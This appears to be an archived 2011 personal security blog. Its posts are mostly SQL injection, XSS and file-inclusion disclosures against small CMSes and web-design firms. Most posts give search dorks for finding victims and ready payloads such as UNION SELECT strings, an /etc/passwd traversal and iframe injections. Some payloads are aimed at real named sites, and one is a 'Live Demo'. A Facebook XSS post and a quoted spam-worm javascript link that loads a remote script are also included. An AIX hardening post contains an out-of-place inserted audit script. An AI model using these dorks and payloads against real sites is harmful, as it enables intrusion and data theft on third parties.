Wednesday, December 21, 2011

AIX IP Stack Tuning

I had some problems during an AIX server assessment/hardening recently. After a few Google searches, I found this great blog, http://www.cymru.com, which helped a lot in my assessment.

1. TCP send and receive spaces

The TCP send and receive spaces directly affect the TCP window size parameter. An increased window size allows for more efficient transfers, particularly bulk transfers such as FTP and HTTP. The default for each is not optimal and should be increased to 32768 bytes. This value should not be increased above 64K bytes unless the implications of RFC1323 and RFC2018 are fully understood and support for both is enabled.

Do not enable RFC1323 without also enabling support for RFC2018. Remember, pipe drain is a Bad Thing[tm].

A. AIX
    /usr/sbin/no -o tcp_sendspace=32768
    /usr/sbin/no -o tcp_recvspace=32768

   
2. Socket queue defense against SYN attacks

While great effort is undertaken to defend any network from those with malicious intent, several ports (largely TCP) must remain open to conduct business. Internet vandals may attempt to exploit these ports to launch a denial of service attack. One of the most popular attacks remains the SYN flood, wherein the socket queue of the attacked host is overwhelmed with bogus connection requests. To defend against such attacks, certain UNIX variants maintain separate queues for inbound socket connection requests. One queue is for half-open sockets (SYN received, SYN|ACK sent), the other queue for fully-open sockets awaiting an accept() call from the application. These two queues should be increased so that an attack of low to moderate intensity will have little to no effect on the stability or availability of the server.

A. AIX
    /usr/sbin/no -o clean_partial_conns=1
    This setting will instruct the kernel to randomly remove half-open sockets from the q0 queue to make room for new sockets.


3. Redirects

A miscreant can use IP redirects to modify the routing table on a remote host. In a well-designed network, redirects to the end stations should not be required. Both the sending and accepting of redirects should be disabled.

A. AIX
    /usr/sbin/no -o ipignoreredirects=1
    /usr/sbin/no -o ipsendredirects=0

   
4. ARP cleanup

It is possible for a miscreant to create resource exhaustion or performance degradation by filling the IP route cache with bogus ARP entries. In Solaris, there are two parameters that govern the cleanup interval for the IP route cache. For unsolicited ARP responses, the parameter to be tuned is arp_cleanup_interval. In AIX, the cleanup interval is governed by the value of arpt_killc. However, this parameter governs both solicited and unsolicited ARP entries. For this reason, it is likely best to leave the parameter at the default setting of 20 minutes.

A. AIX
    /usr/sbin/no -o arpt_killc=20


5. Source routing

With source routing, an attacker can attempt to reach internal IP addresses - including RFC1918 addresses. It is important to disable the acceptance of source routed packets to prevent subtle probes of your internal networks.

A. AIX
    /usr/sbin/no -o ipsrcroutesend=0
    Disable the sending of source routed packets.

    /usr/sbin/no -o ipsrcrouteforward=0
    This is important if the box is routing, e.g. a firewall. Disable this feature to prevent the host from forwarding source routed packets.


6. TIME_WAIT setting

On a busy web server, many sockets may linger in the TIME_WAIT state. This is caused by improperly coded client applications that do not properly shut down a socket. This can also be used as a type of DDoS attack.

A. AIX
    No tuning recommendations.


7. Broadcast ECHO response

Smurf attacks work by sending ICMP type 8 code 0 (ECHO REQUEST) messages to a broadcast address from a spoofed address. Some IP stacks will respond, by default, to such messages. This should be disabled. Further, if the host is a firewall (router), it should not propagate directed broadcasts.

A. AIX
    /usr/sbin/no -o directed_broadcast=0
    Do not respond to directed broadcasts.

8. Other broadcast probes

There are two other broadcast probes that a miscreant could utilize against a network. The address mask query can be used to map out the size of the netblock, and set a range for further probes. The timestamp broadcast is another means of mapping and fingerprinting hosts.

A. AIX
    /usr/sbin/no -o icmpaddressmask=0
    Prevent address mask queries.
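The ten settings above, collected into a check a hardening reviewer can run against the output of /usr/sbin/no -a. This is an added example, not from the Cymru page or the original post; the EXPECTED table is taken from the sections above, and SAMPLE_OUTPUT is a constructed imitation of an untuned host so the script runs without an AIX box.

```shell
#!/bin/sh
# Audit AIX 'no' tunables against the values recommended above.
# Added example: EXPECTED mirrors the sections above; SAMPLE_OUTPUT is
# constructed. On a real host pipe '/usr/sbin/no -a' into audit_no_output.

# name=expected-value pairs (arpt_killc is the default the text says to keep)
EXPECTED="tcp_sendspace=32768
tcp_recvspace=32768
clean_partial_conns=1
ipignoreredirects=1
ipsendredirects=0
arpt_killc=20
ipsrcroutesend=0
ipsrcrouteforward=0
directed_broadcast=0
icmpaddressmask=0"

# audit_no_output: read 'name = value' lines (the format 'no -a' prints)
# from stdin; print one line per tunable that differs from EXPECTED or is
# missing from the output. Prints nothing when everything matches.
audit_no_output() {
    actual=$(awk -F'=' 'NF == 2 {
        gsub(/^[ \t]+|[ \t]+$/, "", $1); gsub(/^[ \t]+|[ \t]+$/, "", $2)
        if ($1 != "") print $1 "=" $2 }')
    printf '%s\n' "$EXPECTED" | while IFS='=' read -r name want; do
        got=$(printf '%s\n' "$actual" | awk -F'=' -v n="$name" '$1 == n { print $2; exit }')
        if [ -z "$got" ]; then
            printf 'MISSING  %s (want %s)\n' "$name" "$want"
        elif [ "$got" != "$want" ]; then
            printf 'MISMATCH %s = %s (want %s)\n' "$name" "$got" "$want"
        fi
    done
}

# count_findings: number of deviations in the given 'no -a' style text
count_findings() {
    printf '%s\n' "$1" | audit_no_output | wc -l | tr -d ' '
}

# Constructed sample resembling 'no -a' on an untuned host: default
# send/recv spaces, redirects still accepted and sent, source routing and
# broadcast responses on, and clean_partial_conns absent from the output.
SAMPLE_OUTPUT="          tcp_sendspace = 16384
          tcp_recvspace = 16384
      ipignoreredirects = 0
        ipsendredirects = 1
             arpt_killc = 20
         ipsrcroutesend = 1
      ipsrcrouteforward = 1
     directed_broadcast = 1
        icmpaddressmask = 1"

printf '%s\n' "$SAMPLE_OUTPUT" | audit_no_output
```

Each reported line maps back to one 'no -o' command above, so the output doubles as the remediation list for that host.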


Other references that might help during an AIX assessment/hardening:

http://abstractinitiative.com/PerformanceJungle/2009/09/aix-security-hardening-script/
http://publib.boulder.ibm.com
http://www.boran.com/security/sp/aix_hardening.html
http://www.ncftp.com/ncftpd/doc/misc/ephemeral_ports.html
http://slashzeroconf.wordpress.com/2008/01/20/unix-password-selection-expiration/

Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

Title : hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor : http://www.hileytech.com
Links : http://www.hileytech.com/cartspec.html
Type : Web Application


Parameter 'proddetail.php' in hileyTECH Ecommerce Cart Pro is vulnerable to SQL Injection.
Proof of concept:

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~

Wednesday, November 2, 2011

Wordpress Plugin youtube-uploader Vulnerable to XSS

Title : Wordpress Plugin youtube-uploader Vulnerable to XSS
Dork  : inurl:"youtube-uploader/action.php?action="
by      : p0pc0rn


http://site.com/wp-content/plugins/youtube-uploader/action.php?action=[xss]




~/p0pc0rn/~

Saturday, October 22, 2011

Light & Shade Creative Studio web design multiple sql injections

Title : Light & Shade Creative Studio web design multiple sql injections
Found : 22 October 2011
Web   : http://www.lnsstudio.com/


[sql]
1 - articles-detail.php?aid=[sql]
2 - notice_detail.php?nid=[sql]
3 - photogallery.php?aid=[sql]
4 - alumni-details.php?batch=[sql]
5 - alumni_students.php?batch=[sql]
6 - more..

Examples :
http://www.fhss.edu.np/articles-detail.php?aid=9'
http://www.shangri-la.edu.np/notice_detail.php?nid=3'
http://www.ops.edu.np/notice_details.php?nid=17'


~/p0pc0rn/~

dreams & ideas web design multiple vulnerabilities

Title : dreams & ideas web design multiple vulnerabilities
Found : 22 October 2011
Web   : http://www.dreamsandideas.com


[sql]
1 - products.php?CatID=[sql]
2 - news_details.php?nid=[sql]
3 - success_story_details.php?sid=[sql]
4 - inside.php?id=[sql]
5 - contact.php?id=[sql]
6 - visaupdate_details.php?vid=[sql]
7 - products.php?BrandID=[sql]
8 - more..

Examples :

http://www.alfabetaedu.com/news_details.php?nid=31'
http://www.neoteric.com.np/products.php?BrandID=2'
http://www.cybersansar.com/article_list.php?pageno=1
POST frdate=2011-10-22&todate=2011-10-22&list_article=-Select-&keyword='&Submit=Submit
http://www.enasha.com/bnb_profile.php?pid=148'


[xss]

1 - search.php
2 - search_result.php?mk=

Examples :
http://www.afn.org.np/search.php
POST keyword=<iframe src=http://www.1337day.com />&search.x=0&search.y=0
http://www.enasha.com/search_result.php?mk=Toyota<iframe src=http://www.1337day.com />



~/p0pc0rn/~

Wednesday, October 12, 2011

Monday, August 22, 2011

Run the Application as Administrator Just by a Click!

How to Set Our Application to Always Run as Administrator in Windows 7
-----------------------------------------------------------------------

1 - Right click the application that you want to run as administrator and choose Properties. Before that, make sure you have already created a shortcut for the application.
As an example, I created a cmd.exe shortcut on the Desktop. I want to run cmd.exe as administrator with just a click after this. No need to right click, blablabla.. wasting my time!


2 - Go to the Shortcut tab and choose Advanced.
3 - Tick "Run as Administrator", and DONE!
  
Before as Administrator
After as Administrator. Just by a click!

Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

Title : LASERnet CMS Vulnerable to SQL Injection
Vendor : http://cms.lasernet.gr/index.php?lang=en
Dork : intext:"Powered by Lasernet"
Category: WebApps


http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+


thanks,
-p0pc0rn-


CarRentals CMS Vulnerable to SQL Injection


Title : CarRentals CMS Vulnerable to SQL Injection
Vendor : N/A
Dork : intext:"Powered by CarRentals CMS"
Category: WebApps


http://localhost.com/*.php?id=[SQL]

~/POC/~
-------

http://localhost.com/book-offer.php?offer_id=-1' /*!12345union*/ select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11--+


thanks,
-p0pc0rn-

Thursday, August 4, 2011

Cambria Web Design Vulnerable to Multiple SQL Injection


Title : Cambria Web Design Vulnerable to Multiple SQL Injection
Vendor : http://www.cambria.com
Dork : intext:"Web Design by Cambria" filetype:asp
Dork2 : intext:"Custom software and Web Design by Cambria"
Category: WebApps


http://localhost.com/product_page.asp?ProductID=[SQL]&ProductCatID=[SQL]
http://localhost.com/pagecontent.asp?page=[SQL]
http://localhost.com/product_page.asp?Search=[SQL]
http://localhost.com/articles.asp?ArticleID=[SQL]


There are more parameters that need to be checked.

~//POC//~

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/product_page_detail.asp, line 78

-------------------------------------------------------------------------------------
http://127.0.0.1/product_page_detail.asp?ProductID=1&ProductCatID=1+or+1=convert(int,(@@version))

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/product_page_detail.asp, line 78
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

- p0pc0rn -

shoma.net Web Design Vulnerable to Multiple SQL Injection


Title : shoma.net Web Design Vulnerable to Multiple SQL Injection
Website : http://www.shoma.net/
Dork : Developed by Shoma.net
Type : WebApps


http://localhost.com/SubNews.cfm?NewsID=[SQL]
http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL]
http://localhost.com/Hotellist.cfm?starID=[SQL]
http://localhost.com/index_show.asp?idbasic=[SQL]
http://localhost.com/index_view.asp?idrecipie=[SQL]

There are more parameters that need to be checked.

#####
#POC#
#####

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/Subnews.cfm?newsid=1'
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'newsId=1'''.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++


- p0pc0rn -

Tuesday, July 26, 2011

Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections


Title : Infotrex Solutions Web Design Vulnerable to Multiple SQL Injections
Vendor: http://www.infotrex.net
Dork : intext:"Web Development by Infotrex Solutions"


+++++++++++++++++++++++++++++++
Microsoft Access Injection +
+++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 - http://www.site.com/details.asp?catid=[]&subcatid=[]&pid=[SQL] +
2 - http://www.site.com/news.asp?action=read&nID=[SQL] +
3 - http://www.site.com/product.asp?catid=[SQL] +
4 - http://www.site.com/contents.asp?id=[SQL] +
5 - http://www.site.com/details.asp?pid=[SQL] +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Thanks,
p0pc0rn

Tuesday, July 5, 2011

4shared Downloader

How to use?

1 - Make sure you have an account in 4shared.com..just a free account :)
2 - Login into your account

3 - Open command prompt and just run this python script :)

Usage : 4shared.py Url


4 - It will open the download link from your browser and just click save


Here's the script
http://pastebin.com/2eDsyjm9

Friday, July 1, 2011

Adf.ly Bypass

Hate waiting even 5 secs?
Want to bypass the waiting time?
It's easy.
As an example, say you want to download this:
http://adf.ly/1wuNc
Go to the link, and in the URL bar type this:
javascript:showSkip();
The countdown will be skipped and you can get the real link directly :)

4shared Download Tricks

So there are two tricks you can use to download a file from 4shared.com.
Let's say we want to download this thing:
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
We can:
1 - Bypass the waiting time.
Go to the download page:
http://www.4shared.com/get/fTg3hpDR/a_byte_of_python__persian_tran.html
and in the URL bar type this:
javascript:alert(c=0)
This cuts the waiting time from 59 secs to 0 sec :)

Another way is:

2 - Get the download URL directly.
On the file page
http://www.4shared.com/file/fTg3hpDR/a_byte_of_python__persian_tran.html
you just need to type this in the URL bar:
javascript:alert(startDownload)

The download link will pop up; just copy and paste it into the URL bar to download :)

Unix Command in Windows???


Yeah, there's a little secret that you might not know about Windows 7. We can use Unix commands in Windows without using Cygwin! Believe it?
Let's look at it together.

The name of this technology? It used to be called Interix, then became Services for UNIX (SFU) as they added more bits on top of Interix, and is now known as Subsystem for UNIX-based Applications (SUA). The current name is more of a mouthful, but is a more accurate name.


So, to run SUA, you need one of the following versions of Windows:
Windows Server 2008
Windows Server 2003 R2
Windows 7 - Enterprise or Ultimate Edition
Windows Vista - Enterprise or Ultimate Edition

Other than those? It doesn't work :(

How to enable this SUA? [I'm using Windows 7 Ultimate in this case as example]

1 - Go to the Control Panel.
2 - Browse to Programs and Features.
3 - Click Turn Windows features on or off.
4 - Select the check box for Subsystem for UNIX-based Applications.
5 - Click OK
6 - In the start menu, click All Programs > Subsystem for UNIX-based Applications > Download Utilities for Subsystem for UNIX-based Applications
7 - Download the SUA installer from the Microsoft website. In my case, I downloaded this one: Utilities and SDK for UNIX-based Applications_X86.exe. Choose the one that suits your PC.
8 - Once downloaded, double-click Utilities and SDK for UNIX-based Applications_X86.exe in your downloads folder.
9 - Go through the auto-installer.
10 - I'd recommend you choose the custom setup and enable the GNU Utilities and then, in the following step, select all three check boxes to allow su to root, enable setuid and enable case sensitivity.
11 - Finished! And now you can run UNIX commands.

Wednesday, June 15, 2011

Axel Accelerator for Windows

I googled a bit and found someone who shared this Axel accelerator for Windows users.

Download here.
http://www.mediafire.com/?wi8dw1hbaqinhfz

Extract it and just use it!

Usage is as below:
Usage: axel.exe [options] url1 [url2] [url...]

--max-speed=x -s x Specify maximum speed (bytes per second)
--num-connections=x -n x Specify maximum number of connections
--output=f -o f Specify local output file
--search[=x] -S [x] Search for mirrors and download from x servers
--header=x -H x Add header string
--user-agent=x -U x Set user agent
--no-proxy -N Just don't use any proxy server
--quiet -q Leave stdout alone
--verbose -v More status information
--alternate -a Alternate progress indicator
--help -h This information
--version -V Version information
screenshot




credit to

// ghuntley https://github.com/ghuntley/cygwin-axel/
// ~n2j3 http://st0rage.org/~n2j3/ :drunk:

Monday, June 6, 2011

Web Wiz Site News Vulnerable to SQL Injection

#####################################################################
## Title : Web Wiz Site News Vulnerable to SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.webwiz.co.uk/ ##
## Dork : Powered by Web Wiz Site News ##
#####################################################################

- POC -
http://site.com/news/news_item.asp?NewsID=[SQL]

- Thanks -
p0pc0rn

edit: found by others already. http://www.1337day.com/exploits/15677

Friday, June 3, 2011

El Espejo Web Design Vulnerable to Multiple SQL Injection

#####################################################################
## Title : El Espejo Web Design Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.elespejodesign.com.ar/sitio/index.php ##
## Dork : !@#$%^&*()_ ##
#####################################################################

- POC -
http://site.com/sitio/something.php?id=[SQL]
http://site.com/sitio/detalle_foto.php?id=-236 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a,database()),16,17,18,19--

http://site.com/sitio/detalle_edificios.php?id=-144 UNION SELECT 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--

Not just the index.php parameter; more parameters are vulnerable. Check it out.

- Thanks -
p0pc0rn

Inmueblesoft CMS Vulnerable to Multiple SQL Injection


##################################################################
## Title : Inmueblesoft CMS Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: www.inmueblesoft.com ##
## Dork : intext:"Inmueblesoft" filetype:php ##
#################################################################


- POC -
http://site.com/index.php?tabla=something&id=[SQL]
http://site.com/index.php?tabla=something&id=-15 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--



Not just the index.php parameter; more parameters are vulnerable. Check it out.

- Thanks -
p0pc0rn

Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection


Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork : intext:"Powered by Acuity CMS."
Web : http://www.acuitycms.com/


SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=1 FALSE

thanks,
-p0pc0rn-

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection
Found by : p0pc0rn
Dork : intext:"Developed By : Golden IT Solutions"

SQL Injection
----------------
http://www.site.com/anypath.php?ID=[SQL]

POC
----
http://www.site.com/memProfile.php?ID=-2800 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--



thanks,
-p0pc0rn-

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :)
-------------------------
By p0pc0rn May 2011
Dork: inurl:"index.php?loc=subindex"
Exploit :

site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd





thanks
-p0pc0rn-

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook
------------------------------------------

If you notice a wall post like this, NEVER EVER CLICK IT!!
[spam]Not like Justin Bieber, who always says never say never. He's an idiot [/spam]

Take note of the URL at the bottom of your browser. When you click the link, you will execute a JavaScript snippet that posts it on your wall.
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
http://pelorak.info/verify.js
<--bad evil code!!



I tried clicking it and this is what appeared.


And then it'll redirect you here.

So, just like the others', your profile will be full of spam.
Beware, more will come after this. Someone will take this as an opportunity to have fun.

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PostgreSQL Injection


Title : Creatop Web Design Vulnerable to PostgreSQL Injection
Vendor: http://www.creatop.com.au/
Found : by p0pc0rn
Dork : intext:"by Creatop" filetype:cfm


PostgreSQL Injection
--------------------
http://www.victim.com/index.cfm?MenuID=[Injection]

Example:
http://www.victim.com/index.cfm?MenuID=80 and 1=cast(version() as int)
### ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" ###



.:p0pc0rn:.

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities


Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"


Blind SQL Injection
-------------------

http://www.victim.com/site.php?article_id=[Blindey]
Eg:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 TRUE
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 FALSE

http://www.victim2.com/site.php?cid=[Blindey]
Eg:
http://www.victim2.com/university.php?cid=8 or 1=1-- TRUE
http://www.victim2.com/university.php?cid=8 or 1=2-- FALSE



http://www.victim3.com/site.php?CatId=[Blindey]
Eg:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- TRUE
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- FALSE

There are more parameters that need to be checked out. There's a high possibility of SQL injection vulnerabilities in them too.

Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]

thanks,
#p0pc0rn#

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection


Title : ezeXs Web Design Vulnerable to SQL Injection
Web : http://www.ezexs.com/
By : p0pc0rn
Dork : intext:"Powered by ezexs.com"


Microsoft Access SQL Injection
------------------------------

http://site.com/[type].asp?[id]=[SQL]

Notes : All parameters are possible to be injected.

POC
---

http://site.com/product_detail.asp?Id=57 union select 1 from test.a
http://site.com/category.asp?Id=49 union select 1 from test.a



more out there.

thanks,
-p0pc0rn-

Site Developed by Magfiroh Vulnerable to SQL Injection


Title : Site Developed by Magfiroh Vulnerable to SQL Injection
Filetype : ColdFusion
Found by : p0pc0rn
Dork : inurl:".cfm?judul="


SQL
---

http://site.com/parameter.cfm?judul=[SQL]

POC
---

http://site.com/download_detail.cfm?judul=1'

Live Demo
---------

http://www.stiabinabanua.ac.id/download_detail.cfm?judul=30 UNION SELECT 1,2,version(),user(),5,6--



thanks,
-p0pc0rn-

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection


Title : eksi7 Web Design Vulnerable to Multiple SQL Injection
Vendor: http://www.eksi7.com
Found by : p0pc0rn
Dork :
inurl:"devam.asp?haber_id="
inurl:"kat_list.asp?kat_id="
intext:"tasarim ve programlama eksi7 web hizmetleri"
intext:"design and programming eksi7 web services"


MSSQL
-----
http://site.com/path/haber/devam.asp?haber_id=[MSSQL]

POC
---
http://site.com/v4/haber/devam.asp?haber_id=7927+and+1=@@version


JetDatabase
-----------
http://site.com/path/haber/devam.asp?haber_id=[SQL]
http://site.com/path/icerik/kat_list.asp?kat_id=[SQL]

POC
---
http://site.com/abana/haber/devam.asp?haber_id=460 UnIoN SelECt 1 from test.a
http://site.com/rozey/icerik/kat_list.asp?kat_id=7 unIoN SelEct 1 from test.a


thanks,
-p0pc0rn-

Monday, April 4, 2011

Autonics Corporation Websites Vulnerable to Remote File Download

Title : Autonics Corporation Websites Vulnerable to Remote File Download
Found by : p0pc0rn
Dork : inurl:"download.php?bo_code=data"

POC
---
http://site.com/board/download.php?bo_code=data&filename=[remote file download]

* -------------------------------------------------------------------------
* @Creator Psyche Lee
* @version 1.0
* @date 2007-11-22
* -------------------------------------------------------------------------
* Copyright 2007 by Psyche Lee
* -------------------------------------------------------------------------
****more****

thanks,
-p0pc0rn-

Sunday, April 3, 2011

Master Password in Firefox


Master Password in Firefox
--------------------------


Some of us may have stored passwords for some sites in our browser. So..
It's really important to set your master password in the Firefox browser.
Why do we need to set the master password?
This is because, if an attacker gets physical access to our computer, for example, they can check our stored passwords at

Tools > Options > Security > Saved Password > Show Password


Dangerous meh?!

What you need to do is simple, just set the master password

Tools > Options > Security > Master Password



and then each time someone attempts to see the saved passwords, Firefox will ask for the master password first. The same happens if someone tries to browse to your favourite website where you stored a password in the browser: Firefox will ask for the master password first.


Have a try.

Thanks
-p0pc0rn-

Tuesday, March 29, 2011

New XSS at m.facebook.com

So, I noticed that there's a new XSS vulnerability found at Facebook by someone.
I figured it out after I saw my friend update his Facebook status in Indonesian.


So, what the attacker can do is this: when a victim clicks the link, the victim will automatically update his/her Facebook status via.. Facebook's own apps!!
You can see in the screenshot that the status is updated via Share.

POC of XSS


So, what does the attacker do to make the victim update their status just by clicking the link??

http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx='%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value='Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E

P/S
- If you want to click the link without updating your Facebook, log out first :D
- Turn the shortened URL into the real URL first
- Still, never click. Maybe some attacker can use a dangerous script for a bad attempt
- Just remove the status update before your friends click it. Please don't share it for fun. It can be something dangerous for your Facebook account if the attacker wants it to be.

Edited:
- The Facebook team already fixed this vuln.
- My friend also blogged about this. here
Disclaimer: I'm not the one who found this vuln first. Kudos to the real finder.

Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities


Title : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn


SQL
---
Vulnerable Parameters are

Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]

POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a

Method = POST
-------------
buscador.asp
ingresar.asp

XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]


thanks,
-p0pc0rn-

Inventory Mojo Software Vulnerable to Multiple SQL Injections


Title : Inventory Mojo Software Vulnerable to Multiple SQL Injections
Found by : p0pc0rn
Dork : intext:"Powered by Inventory Mojo Software."

SQL
---
Vulnerable Parameters are

Method = GET
------------
categoria.asp
producto.asp
srubro.asp
marca.asp

Method = POST
-------------
buscar.asp
Login.asp
NewUser.asp
do_addToNewsletter.asp

POC
---
http://site.com/categoria.asp?CT=6' and '1'='1 TRUE
http://site.com/categoria.asp?CT=6' and '1'='0 FALSE

thanks,
-p0pc0rn-

Sunday, March 20, 2011

Shimbi CMS Vulnerable to Multiple SQL Injections


Title : Shimbi CMS Vulnerable to Multiple SQL Injections
Vendor : http://www.shimbi.in/
Found by : p0pc0rn
Dork : intext:"Powered By Shimbi CMS"


SQL Injection in details.php parameter
---------------------------------------
http://site.com/details.php?id=[sql]

POC
---
http://site.com/details.php?id=112 UNION SELECT 1,2,3,4,version(),6,7,8


SQL Injection in faq_details.php parameter
---------------------------------------
http://site.com/faq_details.php?flag=q&id=[sql]

POC
---
http://site.com/faq_details.php?flag=q&id=1'


SQL Injection in blog/addComment.php parameter
---------------------------------------
http://site.com/blog/addComment.php?topic_id=[sql]

POC
---
http://site.com/blog/addComment.php?stat=stat&type=t&category_id=9&topic_id=-122/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--


thanks,
-p0pc0rn-